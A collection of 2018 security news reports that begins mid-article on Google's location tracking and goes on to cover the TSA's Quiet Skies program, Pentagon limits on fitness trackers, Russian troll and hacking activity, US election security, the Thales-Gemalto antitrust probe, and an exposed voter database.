"I am not opposed to background location tracking in principle," she said. "It just really bothers me that it is not explicitly stated."

Google offers a more accurate description of how Location History actually works in a place you'd only see if you turn it off — a popup that appears when you "pause" Location History on your Google account webpage. There the company notes that "some location data may be saved as part of your activity on other Google services, like Search and Maps."

Google offers additional information in a popup that appears if you re-activate the "Web & App Activity" setting — an uncommon action for many users, since this setting is on by default. That popup states that, when active, the setting "saves the things you do on Google sites, apps, and services ... and associated information, like location."

Warnings when you're about to turn Location History off via Android and iPhone device settings are more difficult to interpret. On Android, the popup explains that "places you go with your devices will stop being added to your Location History map." On the iPhone, it simply reads, "None of your Google apps will be able to store location data in Location History."

The iPhone text is technically true if potentially misleading. With Location History off, Google Maps and other apps store your whereabouts in a section of your account called "My Activity," not "Location History."

Since 2014, Google has let advertisers track the effectiveness of online ads at driving foot traffic , a feature that Google has said relies on user location histories.

The company is pushing further into such location-aware tracking to drive ad revenue, which rose 20 percent last year to $95.4 billion. At a Google Marketing Live summit in July, Google executives unveiled a new tool called "local campaigns" that dynamically uses ads to boost in-person store visits. It says it can measure how well a campaign drove foot traffic with data pulled from Google users' location histories.

Google also says location records stored in My Activity are used to target ads. Ad buyers can target ads to specific locations — say, a mile radius around a particular landmark — and typically have to pay more to reach this narrower audience.

While disabling "Web & App Activity" will stop Google from storing location markers, it also prevents Google from storing information generated by searches and other activity. That can limit the effectiveness of the Google Assistant, the company's digital concierge.

Sean O'Brien, a Yale Privacy Lab researcher with whom the AP shared its findings, said it is "disingenuous" for Google to continuously record these locations even when users disable Location History. "To me, it's something people should know," he said.


Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

11.8.18 securityaffairs BigBrothers

Journalists revealed a new surveillance program that targets US citizens, the program was previously-undisclosed and code named ‘Quiet Skies’.
According to the Transportation Security Administration (TSA), that has admitted the Quiet Skies, the program has monitored about 5,000 U.S. citizens on domestic flights in recent months.

Quiet Skies was criticized by privacy advocates because the authorities have begun monitoring U.S. citizens that aren’t suspected of a crime or of involvement in terrorist organizations.

The domestic surveillance program aims at collecting extensive information about the movements of the citizens and their behaviour.

“The previously undisclosed program, called ‘Quiet Skies,’” specifically targets travelers who “are not under investigation by any agency and are not in the Terrorist Screening Data Base,” states a bulletin issued in March by the TSA.

The Agency is monitoring individuals who have spent a certain amount of time in specific countries, who have visited those counties within a certain period of time, or that have made a reservation which includes email addresses or phone numbers associated to terrorism suspects could trigger monitoring.

Passengers remain on the Quiet Skies watch list “for up to 90 days or three encounters, whichever comes first, after entering the United States,” according to the TSA. Travelers are not notified when they have been added to the watch list.

Every day about 40 to 50 people on domestic flights are selected under the Quiet Skies program and on average, air marshals follow and monitor about 35 of them.

Quiet skies program
Source atlantamusic.us

This type of surveillance activity is very expensive and according to the experts it drains resources from other vital activities.

At the time there are no data on the cost of the program or whether it allowed authoritied to neutralize any threat.

“Since this initiative launched in March, dozens of air marshals have raised concerns about the Quiet Skies program with senior officials and colleagues, sought legal counsel, and expressed misgivings about the surveillance program, according to interviews and documents reviewed by the Globe.”

Privacy advocates and experts on civil liberties considers the Quiet Skies program worrisome and potentially illegal:

Further details on the program are reported in the article titled “Quiet Skies– A TSA Surveillance Program Targets Ordinary U.S. Citizens” that I have published on the Infosec Institute website.


Pentagon Restricts Use of Fitness Trackers, Other Devices
7.8.18 securityweek  BigBrothers

WASHINGTON (AP) — Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness-tracker or cellphone applications that can reveal their location, according to a new Pentagon order.

The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel, so those capabilities must be turned off in certain operational areas.

Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base.

"These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said.

Defense personnel who aren't in sensitive areas will be able to use the GPS applications if the commanders conclude they don't present a risk. For example, troops exercising at major military bases around the country, such at Fort Hood in Texas or Norfolk Naval Station in Virginia, would likely be able to use the location software on their phones or fitness devices. Troops on missions in more sensitive locations, such as Syria, Iraq, Afghanistan or parts of Africa, meanwhile, would be restricted from using the devices or be required to turn off any location function.

Army Col. Rob Manning, a Pentagon spokesman, said it's a move to ensure the enemy can't easily target U.S. forces.

"It goes back to making sure that we're not giving the enemy an unfair advantage and we're not showcasing the exact locations of our troops worldwide," Manning said.

Concerns about exercise trackers and other electronic devices came to a head in January in the wake of revelations that an interactive, online map was pinpointing troop locations, bases and other sensitive areas around the world.

The Global Heat Map, published by the GPS tracking company Strava, used satellite information to map the locations of subscribers to Strava's fitness service. At the time, the map showed activity from 2015 through September 2017. And while heavily populated areas were well lit, warzones such as Iraq and Syria show scattered pockets of activity that could denote military or government personnel using fitness trackers as they move around.

The Pentagon immediately launched a review, noting that the electronic signals could potentially disclose the location of troops who are in secret or classified locations or on small forward operating bases in hostile areas.

This is the second memo affecting the use of cellphones and other electronic devices that the department has released in recent months. In May, defense officials laid out new restrictions for the use of cellphones and other mobile wireless devices inside the Pentagon.

That memo called for stricter adherence to long-held practices that require phones be left in storage containers outside secure areas where sensitive matters are discussed. But it also stopped short of banning the devices, and instead made clear that cellphones can still be used in common areas and other offices in the Pentagon if classified information is not present.

The latest memo says the new restrictions include GPS functions on fitness trackers, phones, tablets, smartwatches and other applications.

The Pentagon also said it will provide additional cybersecurity training to include the risks posed by the trackers and other mobile devices.

Heather Pierce, a spokeswoman for Fitbit, said Monday: "Fitbit is committed to protecting consumer privacy and keeping data safe. Unlike a smartphone, location data is not collected by Fitbit unless a user gives us access to the data, and users can always remove our access."


Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.18 securityweek BigBrothers

The Russian shadow behind the attack on Italian President Mattarella, a coordinated attack via Twitter involved hundreds of profiles inviting him to resign.
Cybersecurity experts and Italian media believe that the Italian President Sergio Mattarella is the last victim of the Russian troll farm.

On May 27 the late afternoon, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared as a coordinated attack, they were using the hashtag #MattarellaDimettiti (Italian translation: “Mattarella resign”). Messages using this hashtag were rapidly spreading across the Internet, many other legitimate users started using it and it is quite easy to find similar legitimate message today.

But someone has triggered the protest online, someone who has clear interests to destabilize the Italian government.

Actual vice-premier Luigi Di Maio was asking for the indictment of President Mattarella who refused to endorse the choice of a candidate to the Minister of Economy because of his known anti-euro position.

The analysis of social media Twitter revealed that around at two o’clock in the morning there was an anomalous spike in the number of messages against the President Mattarella.

President Mattarella

Were they sleepless Italians or someone was attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes there were about 400 new profiles, that were traced back to a single origin, coordinating the misinformation campaign.

The Huffington Post reported that the Italian law enforcement Polizia Postale confirmed that the source of the campaign was one, but due to countermeasures adopted by the attackers was impossible to find the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved.” states the Huffington Post citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty Twitter profiles involved in the attack against Italian President Mattarella belonging to completely unsuspecting Italians had been used one or more times by the Internet Research Agency (Ira) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample composed of 67% of the archive related to the activity of the Internet Research Agency (Ira) that was published by the Firethirtyeight website.

The website published 3 Million Russian Troll tweets that were analyzed by the US prosecutor Robert Mueller as part of the investigation of the Russian influence on the 2016 Presidential election.

The huge number of tweets was collected by the researchers Darren Linvill and Patrick Warren from the Clemson University.

The archive includes roughly 16,000 tweets in the Italian language, according to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration … the propaganda online attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely under a wider diversionary strategy.

Involving more sophisticated technologies it is possible to obtain better results, let’s think of the involvement of artificial intelligence.

Putin said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than actual ones.

Is the Internet Research Agency itself the result of a bigger troll farm the already leverage artificial intelligence?


Trump Criticized for Not Leading Effort to Secure Elections
2.8.18 securityweek BigBrothers

WASHINGTON (AP) — As alarms blare about Russian interference in U.S. elections, the Trump administration is facing criticism that it has no clear national strategy to protect the country during the upcoming midterms and beyond.

Both Republicans and Democrats have criticized the administration's response as fragmented, without enough coordination across federal agencies. And with the midterms just three months away, critics are calling on President Donald Trump to take a stronger stand on an issue critical to American democracy.

"There's clearly not enough leadership from the top. This is a moment to move," said Maryland Sen. Chris Van Hollen, head of the Democratic Senatorial Campaign Committee. "I don't think they are doing nearly enough."

Various government agencies have been at work to ensure safe voting. The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression.

But Trump himself rarely talks about the issue. And in the nearly two years since Russians were found to have hacked into U.S. election systems and manipulated social media to influence public opinion, the White House has held two meetings on election security.

One was last week. It ran 30 minutes.

The meeting resulted in no new presidential directive to coordinate the federal effort to secure the election, said Suzanne Spaulding, former undersecretary of homeland security who was responsible for cyber security and protecting critical infrastructure.

"Trump's failure to take a leadership role on this, up until this (National Security Council) meeting, misses an opportunity to send a clear message to states that this is a very serious threat," Spaulding said. "We did not get out of this NSC meeting a comprehensive, interagency strategy. It was each department and agency working in their silos."

Garrett Marquis, a spokesman for the NSC, said the government response is robust. He said NSC staff "leads the regular and continuous coordination of the whole-of-government approach to addressing foreign malign influence and ensuring election security."

At a cybersecurity summit on Tuesday, Vice President Mike Pence said he was confident officials could prevent further meddling by foreign agents.

"We will repel any efforts to interfere in our elections," he said.

Republican Sen. Lindsey Graham of South Carolina said government agencies are "doing a lot of good work, but nobody knows about it." He lamented Trump's contradictory statements about whether he accepts the U.S. intelligence assessment that Russia meddled in the 2016 presidential election.

"What I think he needs to do is lead this nation to make sure the 18 election is protected," Graham said recently on CBS' "Face the Nation." ''He needs to be the leader of the movement — not brought to the dance reluctantly. So, I hope he will direct his government, working with Congress, to harden the 18 election before it's too late."

The debate over safeguarding U.S. elections comes as evidence of cyber threats piles up. Facebook announced Tuesday that it has uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms.

The company said it removed 32 accounts from Facebook and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts.

Earlier this month, Microsoft said it discovered that a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said Monday that additional analysis has confirmed that the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., has said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017.

Sen. Jeanne Shaheen, D-N.H., who is not running for re-election, told The Associated Press on Monday that someone contacted her office "claiming to be an official from a country."

A frequent critic of Russia, Shaheen said she didn't know if Moscow was behind the email received in November but had turned the matter over to the FBI.

Shaheen said another senator had been targeted besides McCaskill. "It's my understanding that there is, but I don't want to speak for other senators," she said. When asked if it was a Democratic senator, Shaheen nodded yes.

"People on both sides of the aisle have been beating the drum for two years now about the need for somebody to be accountable for cybersecurity across the government," Shaheen said.

National Intelligence Director Dan Coats said U.S. intelligence officials continue to see activity from individuals affiliated with the Internet Research Agency, whose members were indicted by U.S. special counsel Robert Mueller. Coats said they create new social media accounts disguised as those of Americans, then use the fake accounts to drive attention to divisive issues in America.

In the Obama administration, synchronizing federal agencies' work on election security would have likely been the job of the White House cybersecurity coordinator. Trump's national security adviser, John Bolton, abolished the post in May to remove a layer of bureaucracy from the NSC flow chart.

Under the current structure, the point man for election security is Rear Adm. Douglas Fears. Trump tapped Fears in early June as his deputy assistant to the president and homeland security and counterterrorism adviser.

Fears oversees the election security and other portfolios of the NSC's Cybersecurity Directorate and coordinates the federal government's response to disasters.

Homeland Security Secretary Kirstjen Nielsen says cyber threats are "an urgent, evolving crisis."

"Our adversaries' capabilities online are outpacing our stove-piped defenses," Nielsen said Tuesday. "In fact, I believe that cyber threats collectively now exceed the danger of physical attacks against us. This is a major sea change for my department and for our country's security."


Leaked Chats Show Alleged Russian Spy Seeking Hacking Tools
2.8.18 securityweek BigBrothers

MOSCOW (AP) — Six years ago, a Russian-speaking cybersecurity researcher received an unsolicited email from Kate S. Milton.

Milton claimed to work for the Moscow-based anti-virus firm Kaspersky. In an exchange that began in halting English and quickly switched to Russian, Milton said she was impressed by the researcher's work on exploits — the digital lock picks used by hackers to break into vulnerable systems — and wanted to be copied in on any new ones that the researcher came across.

"You almost always have all the top-end exploits," Milton said, after complimenting the researcher about a post to her website, where she often dissected malicious software.

"So that our contact isn't one-sided, I'd offer you my help analyzing malicious viruses, and as I get new samples I'll share," Milton continued. "What do you think?"

The researcher — who works as a security engineer and runs the malware-sharing site on the side — always had a pretty good idea that Milton wasn't who she said she was. Last month, she got confirmation via an FBI indictment.

The indictment, made public on July 13, lifted the lid on the Russian hacking operation that targeted the 2016 U.S. presidential election. It identified "Kate S. Milton" as an alias for military intelligence officer Ivan Yermakov, one of 12 Russian spies accused of breaking into the Democratic National Committee and publishing its emails in an attempt to influence the 2016 election.

The researcher, who gave her exchanges with Milton to The Associated Press on condition of anonymity, said she wasn't pleased to learn she had been corresponding with an alleged Russian spy. But she wasn't particularly surprised either.

"This area of research is a magnet for suspicious people," she said.

The researcher and Milton engaged in a handful of conversations between April 2011 and March 2012. But even their sparse exchanges, along with a few digital breadcrumbs left behind by Yermakov and his colleagues, offer insight into the men behind the keyboards at Russia's Main Intelligence Directorate, or GRU.

It isn't unusual for messages like Milton's to come in out of the blue, especially in the relatively small world of independent malware analysts.

"There was nothing particularly unusual in her approach," the researcher said. "I had very similar interactions with amateur and professional researchers from different countries."

The pair corresponded for a while. Milton shared a piece of malicious code at one point and sent over a hacking-related YouTube video at another, but contact fizzled out after a few months.

Then, the following year, Milton got back in touch.

"It's been all work, work, work," Milton said by way of apology, before quickly getting to the point. She needed new lock picks.

"I know that you can help," she wrote. "I'm working on a new project and I really need contacts that can provide information or have contacts with people who have new exploits. I am willing to pay for them."

In particular, Milton said she wanted information on a recently disclosed vulnerability codenamed CVE-2012-0002 - a critical Microsoft flaw that could allow hackers to remotely compromise some Windows computers. Milton had heard that someone had already cobbled together a working exploit.

"I'd like to get it," she said.

The researcher demurred. The trade in exploits — for use by spies, cops, surveillance companies or criminals — can be a seedy one.

"I usually steer clear from any wannabe buyers and sellers," she told the AP.

She politely declined - and never heard from Milton again.

Milton's Twitter account — whose profile photo features "Lost" star Evangeline Lilly — is long dormant. The last few messages carry urgent, awkwardly worded appeals for exploits or tips about vulnerabilities.

"Help me find detailed description CVE-2011-0978," one message reads, referring to a bug in PHP, a coding language often used for websites. "Need a work exploit," the message continues, ending with a smiley face.

It isn't clear whether Yermakov was working for the GRU when he first masqueraded as Kate S. Milton. Milton's Twitter silence — starting in 2011 — and the reference to a "new project" in 2012 might hint at a new job.

In any case, Yermakov wasn't working for the anti-virus firm Kaspersky — not then and not ever, the company said in a statement.

"We don't know why he allegedly presented himself as an employee," the statement said.

Messages sent by the AP to Kate S. Milton's Gmail account were not returned.

The exchanges between Milton (Yermakov) and the researcher could be read in different ways.

They might show that the GRU was trying to cultivate people in the information security community with an eye toward getting the latest exploits as soon as possible, said Cosimo Mortola, a threat intelligence analyst at the cybersecurity company FireEye.

It's also possible that Yermakov might have initially worked as an independent hacker, hustling for spy tools before being hired by Russian military intelligence — a theory that makes sense to defense and foreign policy analyst Pavel Felgenhauer.

"For cyber, you have to hire boys that understand computers and everything the old spies at the GRU don't understand," Felgenhauer said. "You find a good hacker, you recruit him and give him some training and a rank — a lieutenant or something — and then he will do the same stuff."

The leak of Milton's conversations shows how the glare of publicity is revealing elements of the hackers' methods — and perhaps even hints about their private lives.

It's possible, for example, that Yermakov and many of his colleagues commute to work through the arched entrance to Komsomolsky 22, a military base in the heart of Moscow that serves as home to the alleged hacker's Unit 26165. Photos shot from inside show it's a well-kept facility, with a czarist-era facade, manicured lawns, flower beds and shady trees in a central courtyard.

The AP and others have tried to trace the men's digital lives, finding references to some of those indicted by the FBI in academic papers on computing and mathematics, on Russian cybersecurity conference attendee lists or — in the case of Cpt. Nikolay Kozachek, nicknamed "kazak" — written into the malicious code created by Fancy Bear, the nickname long applied to the hacking squad before their identities were allegedly revealed by the FBI.

One of Kozachek's other nicknames also appears on a website that allowed users to mine tokens for new weapons to use in the first-person shooter videogame "Counter Strike: Global Offensive" — providing a flavor of the hackers' extracurricular interests.

The AP has also uncovered several social media profiles tied to another of Yermakov's indicted colleagues — Lt. Aleksey Lukashev, allegedly the man behind the successful phishing of the email account belonging to Hillary Clinton's campaign chairman, John Podesta.

Lukashev operated a Twitter account under the alias "Den Katenberg," according to an analysis of the indictment as well as data supplied by the cybersecurity firm Secureworks and Twitter's "Find My Friends" feature.

A tipster using the Russian facial recognition search engine FindFace recently pointed the AP to a VKontatke account that, while using a different name, appears active and features photos of the same young, Slavic-looking man.

Many of his posts and his friends appear to originate from a district outside Moscow known as Voskresensky. The photos show him cross-country skiing at night, wading in emerald waters somewhere warm and visiting Yaroslavl, an ancient city northwest of Moscow. One video appeared to show Russia's 2017 Spasskaya Tower Festival, a military music festival popular with officers.

The AP could not establish with certainty that the man on the VKontatke account is Lukashev. Several people listed as friends either declined to comment when approached by the AP or said Lukashev's name was unknown to them.

Shortly thereafter, the profile's owner locked down his account, making his vacation snaps invisible to outsiders.

The exchanges between the cybersecurity researcher and Kate S. Milton are available here.


DHS Unveils National Risk Management Center
1.8.18 securityweek   BigBrothers

Kirstjen Nielsen introduces National Risk Management Center

Secretary of Homeland Security Kirstjen Nielsen said on Tuesday that the U.S. Department of of Homeland Security (DHS) has launched The National Risk Management Center, a joint center housed within DHS that will enable the private sector and government to collaborate and devise solutions to reduce risk to critical infrastructure.

Announced at the DHS National Cybersecurity Summit today in New York City, the new center will focus on three things:

● Identify, assess, and prioritize efforts to reduce risks to national critical functions, which enable national and economic security;

● Collaborate on the development of risk management strategies and approaches to manage risks to national functions; and

● Coordinate integrated cross-sector risk management activities.

According to the DHS, the center will lead a series of activities that will help “define what is truly critical; create the frameworks by which government and industry collectively manage risk; and initiate specific cross-sector activities to address known threats.”

Notable attendees and participants at the Summit include, Vice President Mike Pence, Secretary of Energy Rick Perry, FBI Director Christopher Wray, Commander, U.S. Cyber Command and Director, National Security Agency General Paul M. Nakasone.

A live stream of the event can be watched online throughout the day.


Senator Urges Federal Agencies to Ditch Adobe Flash
28.7.18 securityweek BigBrothers

United States Senator Ron Wyden on Wednesday sent a letter to national agencies demanding a collaboration on ending the government use of Adobe Flash.

Set to reach an end-of-life status in 2020, Adobe’s Flash Player is continually plagued by critical vulnerabilities. Two zero-days in the software were patched this year alone, but not before threat actors had exploited them in targeted attacks.

Immediately after Adobe announced plans to kill-off the plugin a year ago, Apple, Facebook, Google, Microsoft and Mozilla outlined plans to completely remove support for Flash from their products as well.

Sent to National Institute of Standards and Technology (NIST) Director Walter G. Copan, National Security Agency Director General Paul M. Nakasone, and Department of Homeland Security Secretary Kirstjen Nielsen, Senator Wyden’s letter (PDF) requests the end of government use of Flash by August 2019.

Senator Wyden cites not only the looming end of technical support for Flash, but also the inherited security vulnerabilities in the plugin as the main reason to dispose of it.

“Flash is widely acknowledged by technical experts to be plagued by serious, largely unfixable cybersecurity issues that could allow attackers to completely take control of a visitor’s computer, reaching deep into their digital life,” the letter reads.

The United States Computer Emergency Readiness Team (US-CERT) has warned about the risks of using Flash nearly a decade ago, the letter also reads.

“The U.S. government should begin transitioning away from Flash immediately, before it is abandoned in 2020,” Senator Wyden says. He also noted that the federal government has previously failed to transition from decommissioned software, as was the case with Windows XP, which cost millions for premium support after its end-of-life in 2014.

The three agencies, he says, provide the majority of cybersecurity guidance to government agencies, so they should ensure that federal workers are protected from cyber threat.

“To date, your agencies have yet to issue public guidance for the unavoidable transition away from Flash. A critical deadline is looming – the government must act to prevent the security risk posed by Flash from reaching catastrophic levels,” the letter reads.

The Senator asks NIST, NSA, and DHS to mandate that no new Flash-based content should be deployed on federal websites within 60 days and that all Flash-based content should be removed from the federal websites by August 1, 2019.

Flash should also be removed from the agencies’ employees’ computers by that date, Wyden said.


Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.18 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen by 44% of respondents claiming that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), worsened only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."


EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.18 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

The European Commission, the 28-nation EU's executive arm, said it wants to determine whether the merger will increase prices as well as reduce choice and innovation for customers of hardware security modules (HSM).

An HSM is hardware that "runs on encryption software to "generate, protect, and manage encryption keys used to protect data in a secure, tamper-resistant module," it said.

"Our society is increasingly dependent on data security solutions to secure all sorts of social, commercial or personal information," the EU's competition commissioner Margrethe Vestager said in a statement.

"We are opening this in-depth investigation to ensure that the proposed transaction between Thales and Gemalto would not lead to higher prices or less choice in hardware security modules for customers looking to safely encrypt their data," Vestager added.

In a deal valued at about 4.8 billion euros, Thales agreed in December to buy Gemalto, based in the Netherlands, outbidding French competitor Atos.

With the merger, Thales is aimming to become a global leader in digital security.

The commission expressed concern that the merger would reduce players in the market.

Gemalto is active in mobile platforms and services, mobile embedded software and products, smart cards, identification documents, government programs, machine to machine communication, and enterprise security.

The Commission said it has until 29 Noveber to take a decision.


Experts believe US Cyber Command it the only entity that can carry out ‘hack backs’
23.7.18 securityaffairs BigBrothers

The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector.
The U.S. government should opt to carry out hack backs as retaliation against the massive attacks against organizations in the US private sector, and when appropriate, the military’s hacking unit should hit back, this is what three experts said at a panel organized by APCO.

The three experts with experience in the private sector, intelligence community and military, agreed that the private organization victims of cyber attacks have to delegate the response against the attackers to the US Cyber Command.

“I think if it’s going to happen, it’s best in the hands of the government,” said Sean Weppner, chief strategy officer at NISOS Group and a former DOD cyber officer.

The experts highlighted that private companies have no intelligence abilities to attribute the attacks to a specific threat actor and have no specific offensive capabilities to conduct hack backs.

Private companies not only have no capabilities to conduct hack backs, they are not legally authorized to do it.

“The U.S. government should decide how to retaliate against the worst attacks on the country’s private sector, and when appropriate, the military’s hacking unit should hit back, three experts said Monday.” reported CyberScoop.

“The controversial idea entails taking the fight to nefarious actors by attacking their computer network in-kind, probing for exfiltrated data and employing measures to retrieve or destroy stolen information.”

Alex Bolling, the former chief of operations at the CIA’s Information Operations Center, approached the problem of cyber attacks against critical infrastructure that in most of the cases are owned by private entities.

The response of attacks against critical infrastructure operated by private organizations must be delegated to the US Government.

In the majority of the cases, attacks against critical infrastructure are powered by persistent attackers and for this reason, a response requests specific cyber skills and the US CYBERCOM has them.

Speaking of the CYBERCOM Bolling said it is the “agency that is best resourced to respond to threats to [U.S.] national interests…[and] critical infrastructure in the energy, finance and wider commercial space,”

Hack backs the Air Force

Private companies cannot carry out hack backs if we want to avoid a digital far west. A private company that decides to target its attackers is anyway a serious threat to the overall digital community.

“For one, companies venturing out into foreign networks would run the risk of disrupting existing U.S. intelligence or military operations.” continues CyberScoop.

According to Edward Amoroso, CEO of Tag Cyber, the US CYBERCOM should isolate the specific target to hit and attack it limiting the risk of any collateral damage.

“I’d like to think there’s a lot of human intelligence and spy-craft that provides a really good view” to the government, said Amoroso.

Experts warn of the risk of hack back non-responsible party due to a wrong attribution of the attack.

Of course, every threat must be properly approached especially the ones that daily target the U.S. private sector. The three experts urge a proper cyber hygiene to mitigate the risks of cyber attacks and limit the necessity to carry out hack backs.


Robocalling Firm Exposes U.S. Voter Records
22.7.18 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.


Trump-Putin Meeting Puts Finland on Cyber-Attack Target List
22.7.18 securityweek BigBrothers

Historically, Finland has not been targeted by a high number of cyber-attacks, but digital assaults spiked in the days prior to the July 16 meeting between U.S. President Donald Trump and Russian President Vladimir Putin in Helsinki.

The massive rise in cyber-attacks isn’t surprising, given the precedent established earlier this year, when Singapore received a massive wave of attacks from June 11 to June 12, during the Trump-Kim summit.

While most of the cyber-attacks observed during President Trump’s meeting with the North Korean leader appeared to originate from Russia, those observed last week were mainly launched from China, F5 reports.

